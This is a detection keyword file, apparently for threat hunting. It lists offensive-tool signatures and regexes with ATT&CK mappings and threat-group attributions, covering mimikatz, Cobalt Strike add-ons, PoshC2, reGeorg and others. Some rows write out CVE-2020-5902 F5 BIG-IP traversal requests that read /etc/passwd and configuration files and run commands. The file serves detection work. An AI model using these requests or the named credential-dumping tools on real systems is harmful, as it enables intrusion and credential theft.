"*Generating x64 meterpreter shell*",".{0,1000}Generating\sx64\smeterpreter\sshell.{0,1000}","offensive_tool_keyword","AutoBlue-MS17-010","automated exploit code for MS17-010","T1210 - T1040 - T1059.001","TA0001 - TA0002 - TA0005","N/A","Dispossessor","Exploitation tool","https://github.com/3ndG4me/AutoBlue-MS17-010","1","0","#content","N/A","6","10","1240","317","2023-12-24T19:22:26Z","2017-11-25T09:03:38Z","45595"
"*Generating x86 meterpreter shell*",".{0,1000}Generating\sx86\smeterpreter\sshell.{0,1000}","offensive_tool_keyword","AutoBlue-MS17-010","automated exploit code for MS17-010","T1210 - T1040 - T1059.001","TA0001 - TA0002 - TA0005","N/A","Dispossessor","Exploitation tool","https://github.com/3ndG4me/AutoBlue-MS17-010","1","0","#content","N/A","6","10","1240","317","2023-12-24T19:22:26Z","2017-11-25T09:03:38Z","45596"
"*Generator IP@Login;Password*",".{0,1000}Generator\sIP\@Login\;Password.{0,1000}","offensive_tool_keyword","DUBrute","RDP  Bruteforcer","T1110","TA0006","N/A","N/A","Credential Access","https://github.com/ch0sys/DUBrute","1","0","N/A","N/A","10","1","37","28","2018-02-19T13:03:14Z","2017-06-15T08:55:46Z","45597"
"*GenericC2Relay.cs*",".{0,1000}GenericC2Relay\.cs.{0,1000}","offensive_tool_keyword","AzureC2Relay","AzureC2Relay is an Azure Function that validates and relays Cobalt Strike beacon traffic by verifying the incoming requests based on a Cobalt Strike Malleable C2 profile.","T1090 - T1090.003 - T1027 - T1027.005 - T1071 - T1071.001","TA0042 - TA0005 - TA0011","N/A","N/A","C2","https://github.com/Flangvik/AzureC2Relay","1","0","N/A","N/A","10","10","220","49","2021-02-15T18:06:38Z","2021-02-14T00:03:52Z","45601"
"*Genetic-Malware/Ebowla*",".{0,1000}Genetic\-Malware\/Ebowla.{0,1000}","offensive_tool_keyword","Ebowla","Framework for Making Environmental Keyed Payloads","T1027.002 - T1059.003 - T1140","TA0005 - TA0040","N/A","N/A","Exploitation tool","https://github.com/Genetic-Malware/Ebowla","1","1","N/A","N/A","10","8","748","171","2019-01-28T10:45:15Z","2016-04-07T22:29:58Z","45602"
"*genMalDoc()*",".{0,1000}genMalDoc\(\).{0,1000}","offensive_tool_keyword","dropper","Generates Malicious Office Macro Enabled Dropper for DLL SideLoading and Embed it in Lnk file to bypass MOTW","T1059 - T1574.002 - T1218 - T1559.003","TA0002 - TA0005 - TA0009","N/A","N/A","Resource Development","https://github.com/SaadAhla/dropper","1","0","N/A","N/A","10","","N/A","","","","45604"
"*genmkvpwd *",".{0,1000}genmkvpwd\s.{0,1000}","offensive_tool_keyword","JohnTheRipper","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","Black Basta","Credential Access","https://github.com/openwall/john/","1","0","N/A","N/A","N/A","10","11216","2220","2025-04-22T11:24:06Z","2011-12-16T19:43:47Z","45605"
"*gentilkiwi (Benjamin DELPY)*",".{0,1000}gentilkiwi\s\(Benjamin\sDELPY\).{0,1000}","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets","T1134.005 - T1098 - T1547.005 - T1555 - T1555.003 - T1555.004 - T1003.001 - T1003.002 - T1003.004 - T1003.006 - T1207 - T1649 - T1558.001 - T1558.002 - T1552.004 - T1550.002 - T1550.003","TA0004 - TA0006 - TA0003 - TA0008 - TA0009","N/A","Black Basta - APT1 - APT24 - APT28 - APT29 - APT32 - APT33 - APT38 - APT39 - APT41 - APT5 - Akira - Avivore  - BERSERK BEAR - BOSS SPIDER - BRONZE BUTLER - BackdoorDiplomacy - Blue Mockingbird - CHRYSENE - COZY BEAR - Carbanak - Chamelgang - Chimera - Cleaver - Cobalt Group - DarkHydrus - Dragonfly - Earth Lusca - FANCY BEAR - FIN13 - FIN6 - FIN7 - GALLIUM - Gamaredon - HEXANE - Indrik Spider - Ke3chang - Kimsuky - LAPSUS$ - Leafminer - Magic Hound - MuddyWater - OilRig - PittyTiger - Sandworm Team - Scattered Spider - TA505 - TEMP.Veles - Threat Group-3390 - Thrip - Tonto Team - Turla - Unit 29155 - Volt Typhoon - Whitefly - Wizard Spider - menuPass - Dispossessor - DragonForce - Sphinx","Exploitation tool","https://github.com/gentilkiwi/mimikatz","1","0","N/A","N/A","10","10","20094","3854","2024-07-05T17:42:58Z","2014-04-06T18:30:02Z","45606"
"*gentilkiwi*",".{0,1000}gentilkiwi.{0,1000}","offensive_tool_keyword","mimikatz","author of mimikatz and multiple other windows exploitation tools","T1134.005 - T1098 - T1547.005 - T1555 - T1555.003 - T1555.004 - T1003.001 - T1003.002 - T1003.004 - T1003.006 - T1207 - T1649 - T1558.001 - T1558.002 - T1552.004 - T1550.002 - T1550.003","TA0004 - TA0006 - TA0003 - TA0008 - TA0009","N/A","Black Basta - APT1 - APT24 - APT28 - APT29 - APT32 - APT33 - APT38 - APT39 - APT41 - APT5 - Akira - Avivore  - BERSERK BEAR - BOSS SPIDER - BRONZE BUTLER - BackdoorDiplomacy - Blue Mockingbird - CHRYSENE - COZY BEAR - Carbanak - Chamelgang - Chimera - Cleaver - Cobalt Group - DarkHydrus - Dragonfly - Earth Lusca - FANCY BEAR - FIN13 - FIN6 - FIN7 - GALLIUM - Gamaredon - HEXANE - Indrik Spider - Ke3chang - Kimsuky - LAPSUS$ - Leafminer - Magic Hound - MuddyWater - OilRig - PittyTiger - Sandworm Team - Scattered Spider - TA505 - TEMP.Veles - Threat Group-3390 - Thrip - Tonto Team - Turla - Unit 29155 - Volt Typhoon - Whitefly - Wizard Spider - menuPass - Dispossessor - DragonForce - Sphinx","Credential Access","https://github.com/gentilkiwi/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A","45607"
"*Georg is not ready, please check url*",".{0,1000}Georg\sis\snot\sready,\splease\scheck\surl.{0,1000}","offensive_tool_keyword","reGeorg","The successor to reDuh - pwn a bastion webserver and create SOCKS proxies through the DMZ. Pivot and pwn.","T1090 - T1095 - T1572","TA0003 - TA0011","N/A","FIN13 - IRIDIUM - UNC3524 - Worok - COZY BEAR - FANCY BEAR - EMBER BEAR - Sandworm","Data Exfiltration","https://github.com/sensepost/reGeorg","1","0","N/A","N/A","N/A","10","3075","826","2025-03-06T09:56:16Z","2014-08-08T00:58:12Z","45609"
"*Georg says, 'All seems fine'*",".{0,1000}Georg\ssays,\s\'All\sseems\sfine\'.{0,1000}","offensive_tool_keyword","reGeorg","The successor to reDuh - pwn a bastion webserver and create SOCKS proxies through the DMZ. Pivot and pwn.","T1090 - T1095 - T1572","TA0003 - TA0011","N/A","FIN13 - IRIDIUM - UNC3524 - Worok - COZY BEAR - FANCY BEAR - EMBER BEAR - Sandworm","Data Exfiltration","https://github.com/sensepost/reGeorg","1","0","N/A","N/A","N/A","10","3075","826","2025-03-06T09:56:16Z","2014-08-08T00:58:12Z","45610"
"*GeorgePatsias/ScareCrow*",".{0,1000}GeorgePatsias\/ScareCrow.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike script for ScareCrow payloads intergration (EDR/AV evasion)","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/GeorgePatsias/ScareCrow-CobaltStrike","1","1","N/A","N/A","10","10","462","68","2022-07-15T09:39:18Z","2021-06-24T10:04:01Z","45611"
"*georgesotiriadis/Chimera*",".{0,1000}georgesotiriadis\/Chimera.{0,1000}","offensive_tool_keyword","Chimera","Automated DLL Sideloading Tool With EDR Evasion Capabilities","T1574 - T1574.001 - T1218 - T1218.002 - T1070 - T1070.004 - T1036 - T1036.005","TA0005","N/A","N/A","Defense Evasion","https://github.com/georgesotiriadis/Chimera","1","1","N/A","N/A","9","5","469","56","2023-12-19T22:58:03Z","2023-05-15T13:02:54Z","45612"
"*geowordlists --postal-code 75001 --kilometers 25 --output-file /tmp/around_paris.txt*",".{0,1000}geowordlists\s\-\-postal\-code\s75001\s\-\-kilometers\s25\s\-\-output\-file\s\/tmp\/around_paris\.txt.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559","TA0043 - TA0002 - TA0004 - TA0011 - TA0003","N/A","Black Basta","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","N/A","10","10","2354","209","2025-04-09T16:56:24Z","2020-03-09T19:12:11Z","45613"
"*GET */login.jsp/.. /tmui/locallb/workspace/fileRead.jsp?fileName=/etc/hosts*",".{0,1000}GET\s.{0,1000}\/login\.jsp\/\.\.\s\/tmui\/locallb\/workspace\/fileRead\.jsp\?fileName\=\/etc\/hosts.{0,1000}","offensive_tool_keyword","POC","exploit code for F5-Big-IP (CVE-2020-5902)","T1210","TA0008","N/A","N/A","Exploitation tool","https://github.com/yasserjanah/CVE-2020-5902","1","0","#linux","N/A","N/A","1","43","15","2023-05-22T23:32:39Z","2020-07-06T01:12:23Z","45615"
"*GET */tmui/login.jsp/.. /tmui/locallb/workspace/fileRead.jsp?fileName=/config/bigip.conf*",".{0,1000}GET\s.{0,1000}\/tmui\/login\.jsp\/\.\.\s\/tmui\/locallb\/workspace\/fileRead\.jsp\?fileName\=\/config\/bigip\.conf.{0,1000}","offensive_tool_keyword","POC","exploit code for F5-Big-IP (CVE-2020-5902)","T1210","TA0008","N/A","N/A","Exploitation tool","https://github.com/yasserjanah/CVE-2020-5902","1","0","N/A","N/A","N/A","1","43","15","2023-05-22T23:32:39Z","2020-07-06T01:12:23Z","45616"
"*GET */tmui/login.jsp/.. /tmui/locallb/workspace/fileRead.jsp?fileName=/config/bigip.license*",".{0,1000}GET\s.{0,1000}\/tmui\/login\.jsp\/\.\.\s\/tmui\/locallb\/workspace\/fileRead\.jsp\?fileName\=\/config\/bigip\.license.{0,1000}","offensive_tool_keyword","POC","exploit code for F5-Big-IP (CVE-2020-5902)","T1210","TA0008","N/A","N/A","Exploitation tool","https://github.com/yasserjanah/CVE-2020-5902","1","0","N/A","N/A","N/A","1","43","15","2023-05-22T23:32:39Z","2020-07-06T01:12:23Z","45617"
"*GET */tmui/login.jsp/.. /tmui/locallb/workspace/fileRead.jsp?fileName=/etc/passwd*",".{0,1000}GET\s.{0,1000}\/tmui\/login\.jsp\/\.\.\s\/tmui\/locallb\/workspace\/fileRead\.jsp\?fileName\=\/etc\/passwd.{0,1000}","offensive_tool_keyword","POC","exploit code for F5-Big-IP (CVE-2020-5902)","T1210","TA0008","N/A","N/A","Exploitation tool","https://github.com/yasserjanah/CVE-2020-5902","1","0","#linux","N/A","N/A","1","43","15","2023-05-22T23:32:39Z","2020-07-06T01:12:23Z","45618"
"*GET */tmui/login.jsp/.. /tmui/locallb/workspace/tmshCmd.jsp?command=list+auth+user+admin*",".{0,1000}GET\s.{0,1000}\/tmui\/login\.jsp\/\.\.\s\/tmui\/locallb\/workspace\/tmshCmd\.jsp\?command\=list\+auth\+user\+admin.{0,1000}","offensive_tool_keyword","POC","exploit code for F5-Big-IP (CVE-2020-5902)","T1210","TA0008","N/A","N/A","Exploitation tool","https://github.com/yasserjanah/CVE-2020-5902","1","0","N/A","N/A","N/A","1","43","15","2023-05-22T23:32:39Z","2020-07-06T01:12:23Z","45619"
"*GET *https://*/tmui/login.jsp/.. /tmui/locallb/workspace/tmshCmd.jsp?command=whoami*",".{0,1000}GET\s.{0,1000}https\:\/\/.{0,1000}\/tmui\/login\.jsp\/\.\.\s\/tmui\/locallb\/workspace\/tmshCmd\.jsp\?command\=whoami.{0,1000}","offensive_tool_keyword","POC","exploit code for F5-Big-IP (CVE-2020-5902)","T1210","TA0008","N/A","N/A","Exploitation tool","https://gist.github.com/cihanmehmet/07d2f9dac55f278839b054b8eb7d4cc5","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","45620"
"*get_beacon(*",".{0,1000}get_beacon\(.{0,1000}","offensive_tool_keyword","Ninja","Open source C2 server created for stealth red team operations","T1021  -  T1055 - T1071 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","Black Basta","C2","https://github.com/ahmedkhlief/Ninja","1","1","N/A","N/A","10","10","806","170","2022-09-26T16:07:43Z","2020-03-04T14:17:22Z","45621"
"*get_BeaconHealthCheck_settings*",".{0,1000}get_BeaconHealthCheck_settings.{0,1000}","offensive_tool_keyword","cobaltstrike","This aggressor script uses a beacon's note field to indicate the health status of a beacon.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/Cobalt-Strike/beacon_health_check","1","1","N/A","N/A","10","10","142","21","2021-09-29T20:20:52Z","2021-07-08T13:28:11Z","45622"
"*get_c2_messages*",".{0,1000}get_c2_messages.{0,1000}","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and Lateral Movement.","T1548.002 - T1134 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0004 - TA0008 - TA0009 - TA0011 - TA0006 - TA0003 - TA0007 - TA0005 - TA0010","N/A","Black Basta - APT33 - HEXANE - Sandworm - Dispossessor","C2","https://github.com/nettitude/PoshC2","1","1","N/A","N/A","10","10","1908","340","2025-03-06T11:10:20Z","2018-07-23T08:53:32Z","45623"
"*get_c2server_all*",".{0,1000}get_c2server_all.{0,1000}","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and Lateral Movement.","T1548.002 - T1134 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0004 - TA0008 - TA0009 - TA0011 - TA0006 - TA0003 - TA0007 - TA0005 - TA0010","N/A","Black Basta - APT33 - HEXANE - Sandworm - Dispossessor","C2","https://github.com/nettitude/PoshC2","1","1","N/A","N/A","10","10","1908","340","2025-03-06T11:10:20Z","2018-07-23T08:53:32Z","45624"
"*get_cmd_from_task_id*",".{0,1000}get_cmd_from_task_id.{0,1000}","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and Lateral Movement.","T1548.002 - T1134 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0004 - TA0008 - TA0009 - TA0011 - TA0006 - TA0003 - TA0007 - TA0005 - TA0010","N/A","Black Basta - APT33 - HEXANE - Sandworm - Dispossessor","C2","https://github.com/nettitude/PoshC2","1","1","N/A","N/A","10","10","1908","340","2025-03-06T11:10:20Z","2018-07-23T08:53:32Z","45625"
"*get_csexecsvc_net35*",".{0,1000}get_csexecsvc_net35.{0,1000}","offensive_tool_keyword","SharpPack","collection of C# tools that include functionalities like Kerberoasting - ticket manipulation - Mimikatz - privilege escalation - domain enumeration and more","T1558.003 - T1003 - T1059.004 - T1078 - T1212 - T1087 - T1016 - T1071 - T1555 - T1203","TA0003 - TA0004 - TA0006 - TA0008 - TA0009 - TA0011","N/A","N/A","Exploitation tool","https://github.com/Lexus89/SharpPack","1","0","N/A","N/A","10","1","78","19","2019-08-12T13:25:25Z","2018-10-01T12:45:16Z","45626"
"*get_csexecsvc_net40*",".{0,1000}get_csexecsvc_net40.{0,1000}","offensive_tool_keyword","SharpPack","collection of C# tools that include functionalities like Kerberoasting - ticket manipulation - Mimikatz - privilege escalation - domain enumeration and more","T1558.003 - T1003 - T1059.004 - T1078 - T1212 - T1087 - T1016 - T1071 - T1555 - T1203","TA0003 - TA0004 - TA0006 - TA0008 - TA0009 - TA0011","N/A","N/A","Exploitation tool","https://github.com/Lexus89/SharpPack","1","0","N/A","N/A","10","1","78","19","2019-08-12T13:25:25Z","2018-10-01T12:45:16Z","45627"
"*get_csexecsvc_net45*",".{0,1000}get_csexecsvc_net45.{0,1000}","offensive_tool_keyword","SharpPack","collection of C# tools that include functionalities like Kerberoasting - ticket manipulation - Mimikatz - privilege escalation - domain enumeration and more","T1558.003 - T1003 - T1059.004 - T1078 - T1212 - T1087 - T1016 - T1071 - T1555 - T1203","TA0003 - TA0004 - TA0006 - TA0008 - TA0009 - TA0011","N/A","N/A","Exploitation tool","https://github.com/Lexus89/SharpPack","1","0","N/A","N/A","10","1","78","19","2019-08-12T13:25:25Z","2018-10-01T12:45:16Z","45628"
"*get_dns_dnsidle*",".{0,1000}get_dns_dnsidle.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike random C2 Profile generator","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/threatexpress/random_c2_profile","1","1","N/A","N/A","10","10","657","88","2023-01-05T21:17:00Z","2021-04-03T20:39:29Z","45629"
"*get_dns_sleep*",".{0,1000}get_dns_sleep.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike random C2 Profile generator","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/threatexpress/random_c2_profile","1","1","N/A","N/A","10","10","657","88","2023-01-05T21:17:00Z","2021-04-03T20:39:29Z","45630"
"*get_dpapi_masterkeys(*",".{0,1000}get_dpapi_masterkeys\(.{0,1000}","offensive_tool_keyword","Carseat","Python implementation of GhostPack Seatbelt situational awareness tool","T1012 - T1082 - T1087 - T1124 - T1217","TA0006 - TA0007 - TA0009","N/A","N/A","Collection","https://github.com/0xthirteen/Carseat","1","0","#content","N/A","8","3","257","21","2024-11-12T19:37:38Z","2024-11-08T02:08:53Z","45631"
"*Get_DPAPI_Protected_Files*",".{0,1000}Get_DPAPI_Protected_Files.{0,1000}","offensive_tool_keyword","donpapi","Dumping DPAPI credentials remotely","T1003.006 - T1021.001","TA0006 - TA0008","N/A","N/A","Credential Access","https://github.com/login-securite/DonPAPI","1","0","N/A","N/A","N/A","10","1110","130","2025-03-24T10:23:58Z","2021-09-27T09:12:51Z","45632"
"*get_filezilla_creds.rb*",".{0,1000}get_filezilla_creds\.rb.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","FANCY BEAR - EMBER BEAR - Sandworm - Turla - MAZE - LockBit - Bassterlord* - Conti - Hive - Fog - Black Basta - MoneyTaker - INDRIK SPIDER - APT39 - GOLD DUPONT - Common Raven","Framework","https://github.com/rapid7/metasploit-framework","1","1","N/A","N/A","10","10","35400","14272","2025-04-22T20:14:59Z","2011-08-30T06:13:20Z","45633"
"*get_hijackeable_dllname*",".{0,1000}get_hijackeable_dllname.{0,1000}","offensive_tool_keyword","nanodump","The swiss army knife of LSASS dumping. A flexible tool that creates a minidump of the LSASS process.","T1003.001 - T1003.003","TA0006","N/A","Dispossessor","Credential Access","https://github.com/fortra/nanodump","1","1","N/A","N/A","10","10","1918","249","2024-09-17T22:58:11Z","2021-11-10T18:28:15Z","45634"
"*get_implants_all*",".{0,1000}get_implants_all.{0,1000}","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and Lateral Movement.","T1548.002 - T1134 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0004 - TA0008 - TA0009 - TA0011 - TA0006 - TA0003 - TA0007 - TA0005 - TA0010","N/A","Black Basta - APT33 - HEXANE - Sandworm - Dispossessor","C2","https://github.com/nettitude/PoshC2","1","1","N/A","N/A","10","10","1908","340","2025-03-06T11:10:20Z","2018-07-23T08:53:32Z","45635"
"*get_injection_techniques*",".{0,1000}get_injection_techniques.{0,1000}","offensive_tool_keyword","mythic","A .NET Framework 4.0 Windows Agent","T1071.001 - T1071.002 - T1071.004 - T1119 - T1132 - T1030 - T1573.002 - T1008 - T1095 - T1572 - T1090.001 - T1090.002 - T1090.004","TA0011 - TA0009 - TA0010 - TA0005","N/A","Black Basta","C2","https://github.com/MythicAgents/Apollo/","1","1","N/A","N/A","10","10","472","100","2025-04-10T19:47:06Z","2020-11-09T08:05:16Z","45636"
"*get_keystrokes.py*",".{0,1000}get_keystrokes\.py.{0,1000}","offensive_tool_keyword","crackmapexec","A swiss army knife for pentesting networks","T1087.002 - T1110 - T1110.001 - T1110.003 - T1059.001 - T1083 - T1112 - T1135 - T1003.002 - T1003.003 - T1003.004 - T1201 - T1069.002 - T1018 - T1053.002 - T1082 - T1016 - T1049 - T1550.002 - T1047","TA0002 - TA0006 - TA0007","N/A","APT39 - Dragonfly - FIN7 - MuddyWater - ENERGETIC BEAR - EMBER BEAR - BERSERK BEAR - Black Basta","Exploitation tool","https://github.com/byt3bl33d3r/CrackMapExec","1","1","N/A","N/A","10","10","8690","1667","2023-12-06T17:09:42Z","2015-08-14T14:11:55Z","45637"
"*get_list_of_implant_text*",".{0,1000}get_list_of_implant_text.{0,1000}","offensive_tool_keyword","FudgeC2","FudgeC2 - a command and control framework designed for team collaboration and post-exploitation activities.","T1021.002 - T1105 - T1059.001 - T1059.003","TA0008 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/Ziconius/FudgeC2","1","0","N/A","N/A","10","10","253","54","2023-05-01T21:13:56Z","2018-09-09T21:05:21Z","45638"
"*get_masterkeys_from_lsass*",".{0,1000}get_masterkeys_from_lsass.{0,1000}","offensive_tool_keyword","pypykatz","Mimikatz implementation in pure Python","T1003.002 - T1055 - T1078","TA0003 - TA0002 - TA0004","N/A","Black Basta","Credential Access","https://github.com/skelsec/pypykatz","1","0","N/A","N/A","N/A","10","2989","394","2025-02-27T20:37:07Z","2018-05-25T22:21:20Z","45639"
